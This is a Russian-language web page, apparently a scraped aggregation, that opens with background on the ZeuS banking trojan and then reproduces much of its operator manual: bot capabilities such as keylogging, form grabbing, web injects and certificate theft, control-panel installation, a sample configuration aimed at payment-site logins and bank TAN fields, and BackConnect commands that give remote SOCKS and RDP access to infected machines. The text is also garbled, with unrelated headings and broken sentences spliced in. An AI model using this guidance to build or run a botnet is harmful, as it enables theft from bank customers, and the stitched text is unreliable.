Вирус Zeus
Aug 11, 2010 - Двухуровневая система авторизации не может остановить Zeus - он начинает действовать, когда пользователь уже получил доступ. Команда быстрого реагирования на компьютерные чрезвычайные события Украины cert-ua. Проверить файл или ссылку на вирусы Сообщить о ложном. Троянские программы семейства ZBot (ZeuS) появились в 2007 году. Благодаря простоте конфигурации и удобству использования для кражи.
Содержание. Характеристика троянской программы ZeuS был написан. Предназначен для всех версий, и из-за своей структуры, позволяющей работать без подключения программы к, может заразить компьютер даже из гостевой учётной записи. После того, как произошло заражение, троянская программа внедряется в систему и перехватывает ваши регистрационные данные.
Получив ваши данные, программа переводит на счета других зараженных небольшую сумму денег, тем самым, делая невозможным найти счет взломщика. Некоторые версии ZeuS маскируются. После внимательного изучения этой подписи были выявлены некоторые различия, в связи с чем подпись была признана подделкой. Помимо версий для существует ещё 5 разновидностей вируса для мобильных устройств. Они направлены на устройства с операционной системой.
Распространение От ZeuS пострадали 196 ссылки-ловушки. Это был первый в истории случай, когда распространялось через социальные сети. Через пользователям передавалось несколько фотосообщений, которые переадресовывали на сайты с ZeuS. От данного типа распространения троянской программы особенно сильно пострадали,. Центры управления В лаборатории Касперского, согласно статистики, была составлена карта распространения серверов. Как видно по карте, вредоносные адреса разбросаны по всему миру.
Но чаще всего злоумышленники размещают свои серверы у европейских, североамериканских, российских и китайских провайдеров. В этих регионах лучше всего развита сфера предоставления услуг. Скрытое сообщение в программе В одной из модификаций ZeuS содержалось скрытое сообщение, в котором разработчики выразили благодарность разработчикам и, а антивирусы и назвали 'глупыми'. Оригинальный текст сообщения выглядит так: Thanks to KAV and to Avira for new quests, i like it!
NOD32 and SAV is stupid! Ущерб Экспертами компаний по Checkpoint Security и Versafe, участвовавшими в исследовании вредоносной деятельности группы вирмейкеров, похищавших средства со счетов клиентов ведущих европейских банков, был подсчитан ущерб, нанесённый клиентам, который составил €36 млн. Вирусная атака затронула такие страны, как Испания, Италия, Германия и Нидерланды. Атаке подвергался не только персональный компьютер жертвы, но и мобильные устройства клиента.
Примечания.
Код: Zeus-настройка и описание ZeuS -Вирус(далее 'бот') для MS Windows служит для управления компьютерами жертв и получения с них информации при помощи ведения логов.Вообщем то говоря просто это вирус,крадущий историю переходов по страницам инета,запоминающий и передающий своему 'хозяину' Всю эту информацию,не включающую в себя пароли от почтовых программ,асек и всего прочего,что не имеет контакт с браузером. В простонародье вирусмейкеров этот вирус называют Зеусом или Зевсем. ZeuS состоит из трех частей: Панель управления, которая устанавливается на сервер(а). Билдер, является приложением для Windows, служит для задания конфигурации бота.
Бот, является приложением для Windows, но уже запускается на компьютере жертвы. В зависимости от количества активных ботов, сборки, и настройки, вам понадобится от обычного хостинга до мощного сервера или серверов. ZeuS имеет следующие основные возможности и свойства (здесь приведен полный список, в вашей сборке часть этого списка может отсутствовать): Бот: Написан на VC 8.0, без использования RTL и т.д., на чистом WinAPI, за счет этого достигается маленький размер (10-25Кб, зависит от сборки). Не имеет собственного процесса, за счет этого нельзя обнаружить в списке процессов. Обход большинства фаерволов (включая популярный Outpost Firewall версий 3, 4, но сущетвует временная небольшая проблема с антишпионом).
Не дает гарантии беспрепятственного приема входящих соединений. Сложно обнаружить поиском/анализом, бот устанавливается жертве и создает файл с временем системных файлов и произвольным размером.
Работает в лимитированных учетных записях Windows (работа в гостевой учетной записи в настоящее время не поддерживается). Невидим для экваристики антивирусов, тело бота зашифровано. Некоем образом не создает подозрения на свое присутствие, если вы это не захотите. Здесь имеется ввиду то, что любят делать многие авторы spyware: выгрузка фаерволов, антивирусов, запрет на их обновление, блокировка Ctrl+Alt+Del и т.д. Блокировка Windows Firewall (данная функция требуется только для беспрепятственного приема входящих соединений). Все свои настройки/логи/команды бот хранит/принимает/передает в зашифрованном виде по HTTP(S) протоколу.
В текстовом виде данные будете видеть только вы, все остальное ботсервер будет выглядеть как мусор). Обнаружение NAT при помощи проверки своего IP через указанный вами сайт. Отдельный файл конфигурации, что позволяет себя защитить от потери ботнета в случаи недоступности основного сервера. Плюс дополнительные (резервные) файлы конфигурации, к которым бот будет обращаться, когда не будет доступен основной файл конфигурации. Эта система гарантирует выживание вашей ботнета в 90% случаях. Возможность работать с любыми браузерами/программами работающими через wininet.dll (Internet Explorer, AOL, Maxton и т.д.): Перехват POST-данных + перехват нажатых клавиш (включая вставленные данные из буфера обмена). Прозрачный URL-редирект (на фейк-сайты и т.д.) c заданием простейших условий редиректа (например: только при GET или POST запросе, при наличии или отсутствии определенных данных в POST-запросе).
Прозрачная HTTP(S) подмена содержимого (Веб-инжект, который позволяет подменять не только HTML страницы, но и любой другой тип данных). Подмена задается при помощи указания масок подмены. Получение содержимого нужной страницы с исключением HTML-тегов.
Основано на Веб-инжекте. Настраиваемый TAN-граббер для любых стран. Получения списка вопросов и ответов в банке 'Bank Of America' после успешной авторизации.
Удаление нужных POST-данных на нужных URL. Идеальное решение для виртуальных клав-ур: После захода на нужную URL, происходит получение скриншота в области экрана, где была нажата левая кнопка мыши. Получение сертификатов из хранилища 'MY' (сертификаты с пометкой 'Не экспортируемый' не экспортируются корректно) и его очистка. После это любой импортируемый сертификат будет сохранен на сервер. Перехват логина/пароля протоколов POP3 и FTP в независимости от порта и запись его в лог только при удачной авторизации. Изменение локального DNS, удаление/добавление записей в файл%system32% drivers etc hosts, т.е. Сопоставление указанного домена с указанным IP для WinSocket.
Сохраняет содержимое Protected Storage при первом запуске на компьютере. Удаляет Сookies из кэша Internet Explorer при первом запуске на компьютере. Поиск на логических дисках файлов по маске или загрузка конкретного файла. Запись только что посещенных страницы при первом запуске на компьютере. Полезен при установки через сплойты, если вы покупаете загрузки у подозрительного сервиса, можно узнать что грузится еще параллельно.
Получение скриншота с компьютера жертвы в реальном времени, компьютер должен находится вне NAT. Прием команд от серверной части и отправка отчета назад об успешном выполнении. (В настоящее время запуск локального/удаленного файла, немедленное обновление файла конфигурации, уничтожение ОС). HTTP(S) PROXY-сервер. Обновление бота до последней версии (URL новой версии прописывается в файле конфигурации). Панель управления: Для работы требуется PHP + MySQL.
Простой инсталлятор (обычно хватает ввода данных юзера MySQL и нажатия кнопки 'Install'). Многопользовательский режим, каждому пользователю можно задать определенные права доступа. Статистика установок(инсталлов, заражений). Статистика ботов находящихся в онлайн. Разделение ботнета на сабботнеты. Обзор онлайновых ботов (так же возможен фильтр) Просмотр скриншота в реальном времени.
Просмотр и проверка Sock4. Время нахождения бота в онлайн. Скорость соединения (только для ботов вне NAT).
Хранении логов в базе данных. Это дает следующие преимущества: Поиск логов по фильтру содержимого. Поиск логов по шаблонам с выделением нужных POST данных (например позволяет выделять на сайте link=только логи и пароль, отбрасывая при поиски все остальные данные). Хранение логов в зашифрованных файлах, в структуре директорий ботнет страна ID компьютера. Отдача команд ботам (так же возможен фильтр). При знании PHP вы можете самостоятельно перенастроить панель управления по вашем вкусу. Билдер: Написан на VC 8.0, без использования RTL и т.д.
На чистом WinAPI, за счет этого достигается маленький размер (зависит от сборки, в сборке с декодером логов размер будет более 400кб, т.к. Будет включена база стран по IP). Просмотр статуса текущей системы, в качестве теста бота вы можете запустить его на своем компьютере, а потом нажатием одной кнопки удалить его. Декодер логов, с распределением по странам. Билдер файла конфигурации (шифрованного) и самого бота. Полиморфный криптор BETA. В настоящее время находится на стадии тестирования, и не гарантирует сто процентную защиту от антивурсов.
Но гарантировано доведение данной функции до ума в ближайшее время. После скачивания программы ZeuS настоятельно рекомендуется проверить её антивирусом. Файлы, которые вы загружаете никем не проверены и вы скачиваете их на свой страх и риск. Некоторые программы, которые вы можете найти на сайте, могут определяться антивирусами как hack tools (хакерская программа).
Такие программы не наносят вреда вашему компьютеру, однако, стоит учитывать, что в некоторых случаях их использование может попасть под 272-273 статью УК РФ. Настройка бота Пошаговая установка: 1)Из имеющегося у вас пакета сборки, запустите файл 'local cp.exe', это билдер файла конифгурации и бота 2)Откройте раздел 'Builder'. Нажмите кнопку 'Browse' и укажите там файл конфигурации, имя котрого 'local config.txt'. 3)Нажмите кнопку 'Edit config', в результате должен запуститься текстовый редактор. Перенастройте файл вот так: 1! Исходный файл конфигурации представляет собой текстовый файл в кодировки Windows, и нужен только для создания конечного файла конфигурации (который представляет собой бинарный файл для загрузки ботом) и самого бота.
В вашем пакете сборки пример файла конфигурации должен находится в папке 'local' и иметь имя config.txt. Откройте файл можно в любом текстовом редакторе, например 'Блокнот'(Notepad). Файл состоит из записей, по одной записи в строку. Запись же состоит из параметров, первый параметр обычно определяет имя записи (но это не всегда так, например, в случаи когда идет перечисление каких либо данных, имени нет). Параметры разделяются между собой пробелами, если же в самом параметре встречается пробел, или символ табуляции, этот параметр следует заключить в двойные кавычки ('), тоже правило применятся и к имени. Количество параметров не ограничено, также если у записи есть имя, то оно читается без учета регистра Примеры: username Kot Matroskin название записи - username, параметр 1 - Kot, параметр 2 - Matroskin.
Username 'James' Bond' название записи - username, параметр 1 - James, параметр 2 - Bond. Username 'Volodia Putin' название записи - username, параметр 1 - Volodia Putin. 'url' 'index.php название записи - url, параметр 1 - link=параметр 2 - index.php Также существуют специальные имена записей, которые позволяет делить файл конфигурации насколько угодно подразделов, которые могут содержать внутри себя сколько угодно подразделов и записей. Они называются разделами и состоят из имени entry и параметра определяющего название раздела (регистр также не учитывается в данном параметре), окончание же раздела обозначается записью end. Далее в документации, вложенность записи относительно подразделов, будут обозначатся через. Записиь с именем username принадлежащая разделу userdata, будет обозначена как userdata-username и т.д. Примеры: entry 'userdata' fname 'petia' lname 'lolkin' end entry compdata name 'pcvasya' entry devices - содержимое раздела, пример, когда записи не имеют имени, здесь просто идет перечисление устройств.
Cdrom 'hdd' fdd end end Также существует возможность вставки комментариев, комментарий должен находиться в отдельной строке, и начинаться с символа ';'. Если получается, что первый параметр в записи тоже начинается с ';', то этот параметр следует заключить в кавычки. Примеры:;Hello.I think that I'm hero!;How are you/ -это не запись ';I love you' - а вот это уже запись. Записи файла конфигурации Файл состоит из двух разделов StaticConfig и DynamicConfig. StaticConfig, значения этого раздела прописываются непосредственно в файл бота, т.е. В exe, и определяют основное поведение бота на компьютере жертвы. В зависимости от вашей сборки, некоторые параметры могут не иметь для вас значения, все значимые параметры прописаны в примере, прилагаемом к пакету сборки.
Botnet строка - определяет название ботнета, которому принадлежит бот. Строка - название ботнета, до 4-х символов, или 0 - для значения по умолчанию.
Рекомендуемое значение: botnet 0 timerconfig число1 число2 - определяет промежутки времени через которое следует получить обнавление файла конфигурации. Число1 - определяет время в минутах через которое следует обновить файл конфигурации, в случаи успешной загрузки предыдущий раз. Число2 - определяет время в минутах через которое следует обновить файл конфигурации, в случаи ошибки при загрузки предыдущий раз.
Рекомендуемое значение: timerconfig 60 5 timerlogs число1 число1 - определяет промежутки времени через которое следует отправлять накопленные логи на сервер. Число1 - определяет время в минутах через которое следует отправить логи, в случаи успешной отправки предыдущий раз. Число2 - определяет время в минутах через которое следует отправить логи, в случаи ошибки при отправки предыдущий раз. Рекомендуемое значение: timerlogs 2 2 timerstats число1 число2 - определяет промежутки времени через которое следует отправлять статистику на сервер. (сюда входят инасталлы, нахождение в онлайн, открытые порты сервисов socks, скриншоты и т.д.) число1 - определяет время в минутах через которое следует отправить статистику, в случаи успешной отправки предыдущий раз. Число2 - определяет время в минутах через которое следует отправить статистику, в случаи ошибки при отправки предидущий раз. Рекомендуемое значение: timerlogs 20 10 urlconfig - URL по который расположен основн.ать,чем дополнять статью.
Все содержимое этой папки необходимо загрузить на сервер в любую папку доступную по HTTP. Если вы загружаете ее через FTP, то все файлы нужно загрузить в БИНАРНОМ режиме. Для nix - систем выставите права: /.
777 / system - 777 / tmp - 777 Для Windows - систем: system - права на полные права на запись, чтение для пользователя из под которого происходит доступ через HTTP. Для IIS это обычно IUSR. Tmp - также как и для system. После того как все файлы загружены, необходимо через браузер запустить инсталлятор по URL link = http: //%D1%81%D0%B5%D1%80%D0%B2%D0%B5%D1%80/%D0%BF%D0%B0%D0%BF%D0%BA%D0%B0/install/index.php.Следуйте появившимся инструкциям, в случаи возникновения ошибок ( вы будете подробно уведомлены ) в процесс установки, проверти правильность введенных данных, и правильность установки прав на папки. После установки, рекомендуется удалить директорию install, и переименовать файлы cp.
Php ( вход в панель управления ) и gate. Php ( гэйт для ботов ) в любые файлы по вашему желанию ( расширение менять нельзя ). Теперь вы можете благополучно входить в панель управления, введя в браузере URL переименованного файла cp.
Если вы обладаете более новой копией панели управления, и желаете обновить старую версию, то необходимо сделать следующие: 1 ) Скопировать файлы новой панели управления на место старых. 2 ) Переименовать файлы cp. Php согласно их реальным именам выбранным вами при установке старой панели управления. 3 ) На всякой случай, повторно выставить права на директории согласно пункту 2.4. 4 ) Через браузер запустить инсталлятор по URL link = http: //%D1%81%D0%B5%D1%80%D0%B2%D0%B5%D1%80/%D0%B4%D0%B8%D1%80%D0%B5%D0%BA%D1%82%D0%BE%D1%80%D0%B8%D1%8F/install/index.php,и следовать появившимся инструкциям. Процесс работы инсталлятора может занять достаточно большой промежуток времени, это связано с тем, что некоторые таблицы с отчетами могут пересоздаваться. 5 ) Можно пользоваться новой панелью управления.
Файл / system / fsarc. Данный файл содержит в себе функцию для вызова внешнего архиватора. В данный момент архиватор используется только в модуле 'Отчеты::Поиск в файлах' ( reportsfiles ), и вызывается для загрузки файлов и папок в виде одного архива.
По умолчанию функция настроена на архиватор Zip, и является универсальной для Windows и nix, поэтому все что вам нужно сделать, это установить в систему этот архиватор, и дать права на его исполнение. Вы также можете отредактировать этот файл для работы с любым архиватором. Загрузить Zip: link = http: //www.info-zip.org/Zip.html.
= 3. Настройка бота. = = 4. Работа с BackConnect = Работа с BackConnect рассматривается в виде примера. IP BackConnect - сервера: 192.168.100.1 Порт для бота: 4500 Порт для клиентского приложения: 1080 1 ) Запускается серверное приложение ( zsbcs. Exe ) на сервере имеющем свой IP в интернете, для приложения указывается порт, на котором ожидается подключение от бота, и порт к которому будет подключаться клиентское приложение. Exe listen - cp: 1080 - bp: 4500, где 1080 - клиентский порт, 4500 - порт для бота. 2 ) Необходимому боту отправляется команда bcadd service serverhost serverport, где service - номер порта или имя.
сервиса, к которому необходимо подключится на боте. в настоящее время поддерживается только имя socks, которое позволяет подключится к встроенному в бота Socks - серверу. Serverhost - сервер, на котором запушено серверное приложение. Здесь может быть указан IPv4, IPv6, или домен.
Serverport - порт, который указан в опции cp серверного приложение. Пример: bcadd socks 192.168.100.1 4500 - в результате вы получаете socks, bcadd 3389 192.168.100.1 4500 - в результате вы получаете rdp. 3 ) Теперь необходимо ждать подключение бота к серверу, в этот период любая попытка клиентского приложения подключится будет игнорироваться ( будет происходить отключение клиента ). Знаком подключения бота, будет вывод в консоль сервера строки 'Accepted new conection from bot.' 4 ) После подключения бота, вы можете работать со своим клиентским приложением. Вы просто подключаетесь к серверу на клиентский порт ( в данном случаи 1080 ). Например, если вы отдали команду socks, то на клиентском порту вас будет ожидать Socks - сервер, если указали порт 3389, то вы подключаетесь к 192.168.100: 1080 как к обычному RDP.
5 ) После того, когда вам не нужен BackConnect от бота для определенного сервиса, необходимо отдать команду bcdel service serverhost serverport, где все параметры должны быть идентичны параметрам bcadd, которые необходимо удалить. Символы '.'
и '?' Например: bcdel. удалит все BackConnect 'ы, указанные на боте. ПРИМЕЧАНИЯ: 1) Вы можете указывать сколько угодно BackConnect' ов ( т. Bcadd ), но у них не должна быть общая комбинация IP + Port.
Но в случаи наличия такой комбинации, будет запускаться первая добавленная. 2 ) Для каждого BackConnect 'а, вы должны запускать отдельное серверное приложение. 3) В случаи разрыва соединения(падения сервера, падение бота и т.д.), бот будет повторят подключение к серверу бесконечно(даже после перезагрузки PC), до тех пор пока BackConnect не будет удален (т.е. bcdel). 5) Серверное приложение поддерживает IPv6, но в принципе в настоящее время эта поддержка не особо актуальна.
6) Возможен запуск серверного приложения под wine. Написание же elf приложения в настоящее время не планируется. 7) Крайне рекомендуется использовать в опции bp серверного приложения популярные порты (80, 8080, 443 и т.д.), т.к. иные порты могут быть заблокированы провайдером которому принадлежит бот. 9) Метод такого подключения может пригодиться и для ботов, которые находятся вне NAT, т.к. иногда фаерволами Windows или провайдерами, могут быть заблокированы подключения из интернета. = 5. История версий. = Условные метки:. изменение. Версия 1.2.0.0Общее:. Более не будет документации в chm-файле, все будет писаться в этот файл.
+ Теперь бот способен получать команды не только при отправки статуса, но и при отправки файлов/логов. + Локальные данные, запросы к серверу, и файл конфигурации шифруются RC4 с ключом на ваш выбор. Бот: - Устранена ошибка, блокирующая бота на лимитированных ученых записях Windows. Написан новый PE-криптор, теперь PE-файл получается очень аккуратным и максимально имитирует результат работы MS Linker 9.0. Панель управления:. Статус панели управления переведен в BETA. Начет постепенный перевод Панели Управления на UTF-8 (возможны временные проблемы с отображением символов). Версия 1.2.1.0Бот:. BOFA Answers теперь отсылается как BLTGRABBEDHTTP (было BLTHTTPSREQUEST). Ошибка существующая с начала существования бота: низкий таймаут для отсылки POST-запросов, в результате чего блокировалась отсылка длинных (более 1 Мб) отчетов на медленных соединениях (не стабильных), как теоретическое последствие - бот вообще переставал слать отчеты. Общее: + В случаи записи отчета типа BLTHTTPREQUEST и BLTHTTPSREQUEST в поле SBCIDPATHSOURCE (в таблице будет pathsource) добавляется путь URL. Панель управления:. Обновлен redir.php.
Версия 1.2.2.0Бот: - Устранена ошибка в HTTP-инжектах существующая на протяжении ВСЕХ версий бота. При использовании в программе асинхронного режима wininet.dll, был упущен момент синхронизации потоков создаваемых wininet.dll, в результате чего, при некоторых условиях происходило исключение. Версия 1.2.3.0Бот: - Мелкие ошибки в крипторе, спасибо доблестным говноаналитикам из Avira.
Общее:. Изменен протокол раздачи команд ботам. Панель управления:. Полностью переписана панель управления. Бот теперь опять способен получать команды только при отправке отчета об онлайн-статусе (слишком высокая нагрузка). Версия 1.2.4.0Бот: + При работе с HTTP, заголовок User-Agent теперь читается от Internet Explorer, а не является константой как раньше. Теоретически из-за постоянного User-Agent' а, запросы могли блокироваться провайдерами, или попадать под подозрение.
Панель управления: - Исправлена ошибка отображения отчетов, содержащих символы 0 - 31 и 127 - 159. = 6. F. Q. = Q: Что значат цифры в версии? D a - полное изменение в устройстве бота. B - крупные изменения, которые вызывают полную или частичную несовместимость с предыдущими версиями. C - исправления ошибок, доработки, добавление возможностей.
D - номер чистки от антивирусов для текущей версии a. Q: Каким образом генерируется Bot ID? A: Bot ID состоит из двух частей:% name% % number%, где name - имя компьютера ( результат от GetComputerName ), а number - некое число, генерируемое на основе некоторых уникальных данных ОС. Q: Почему трафик шифруется симметричным методом шифрования ( RC4 ), а не асимметричным ( RSA )?
A: Потому что, в использовании сложных алгоритмов нет смысла, шифрование нужно только для скрытия трафика. Плюс в RSA только, в том что не зная ключа находящегося в Панели управления, не будет возможности эмулировать ее ответы. А какой смысл защищаться от этого ( с глобальной точки зрения )? Q: Я повредил таблицы / файлы панели управления, что делать?
A: Воспроизвести инструкции, указанные в пункте 2.5. = 7. Мифы = M: ZeuS использует DLL для своей работы. Существует только один исполняемый PE файл ( exe ). Dll, sys и т. Не когда не было и врятли когда - либо будет. Этот миф пошел в результате того, что в некоторых версия бота для хранения настроек, используются файлы с такими расширениями.
M: ZeuS использует COM ( БХО ) для перехвата Internet Explorer. Dll./ code / center. Control Panel 1.3.2.1 Installer Root user: User name: (1-20 chars): // Вводим логин пользователя Password (6-64 chars): // Вводим пароль пользователя MySQL server: Host: // Host Mysql – Обычно это localhost User: // Имя user базы данных Password: // Пароль user базы данных Database: // Имя базы данных Local folders: Reports: // Название папки с отчетами, по дефолту стоит reports Options: Online bot timeout: // Таймаут бота, по дефолту стоит 25 Encryption key (1-255 chars): // Ключ бота, от 1 до 255 латинских символов Enable write reports to database. // Сохранять отчеты в базу данных? Enable write reports to local path.
// Сохранять отчеты в локальную папку (по дефолту reports)? После ввода всех данных, жмем Install и дожидаемся установки. После видим следующее. Код:;Build time: 09:48:52 GMT;Version: 1.2.7.19 entry 'StaticConfig';botnet 'btn1' timerconfig 60 1 timerlogs 1 1 timerstats 20 1 urlconfig 'urlcompip '4096 encryptionkey '122122';blacklistlanguages 1049 end entry 'DynamicConfig' urlloader 'urlserver 'filewebinjects 'webinjects.txt' entry 'AdvancedConfigs';'end entry 'WebFilters' '!.microsoft.com/.' '!' @./login.osmp.ru/.'
Вирус Zeus
'@./atl.osmp.ru/.' end entry 'WebDataFilters';'passw;login' end entry 'WebFakes';'GP' ' ' end entry 'TANGrabber' 'S3R1C6G' '.&tid=.' '.&betrag=.' 'S3C6' '.' '.' 'KktNrTanEnz' 'S3C6R2' 'SYNCTOKEN=.'
'.' end entry 'DnsMap';127.0.0.1 microsoft.com end end Теперь начинаем править под свой хост: 9 строка - urlconfig '– путь к будущему cfg.bin файлу 11 строка - encryptionkey '122122' - Ключ который вы вводили, когда устанавливали скрипты. Если забыли, то идем в админку - Options - Botnet - Encryption key. ФлагиОпределяет основное условие загрузки, может состоять из нескольких флагов в любом порядке, но с учетом регистра. В настоящее время доступны следующие флаги: P - запускать веб-инжект при POST запросе на URL. G - запускать веб-инжект при GET запросе на URL. L - изменяет предназначение веб-инжекта, если указать этот флаг, то будет получен нужный кусок данных и немедленно сохранен в лог.
F - дополняет флаг L, позволяет записывать результат не в лог, а в отдельный файл. H - дополняет флаг L, сохраняет нужный кусок данных без вырезания тегов. D - запускать веб-инжект раз в 24 часа. С флагом L: databefore - маска данных после которых начинается кусок получаемых данных. Dataafter - маска данных перед которыми кончается кусок получаемых данных. Datainject - играет роль заголовка для получаемых данных, нужен лишь для визуального выделения в логах.
Вирус Neshta
Название элемента должно начинаться с первого байта новой строки и сразу после окончания названия должен быть перенос на следующею строку. Со следующей строки идут данные веб-инжекта, окончание данных обозначается строкой dataend, также это строка должна начинаться с первого байта очередной строки. Внутри элемента вы можете свободно использовать любые символы. Примечания: Как известно, новая строка может обозначаться одним (0x0A) или двумя (0x0D и 0x0A) байтами. В основном веб-инжект используется для подмены содержимого текстовых данных, то данная особенность учтена, и бот успешно запускает веб-инжект даже если у вас новые строки обозначены двумя байтами, а в содержимом URL одним байтом и наоборот. Элементы веб-инжекта могут быть расположены в любом порядке, т.е.
Вирус Zeus Как Удалить
Databefore, dataafter, datainject, или databefore, datainject, dataafter и т.д. Элемент может быть пустым. При использовании флага L, в получаемых данных каждый тег заменяться на один пробел. Пример файла: Подмена заголовка любого сайта по протоколу http на фразу 'HTTP: Web-Inject'.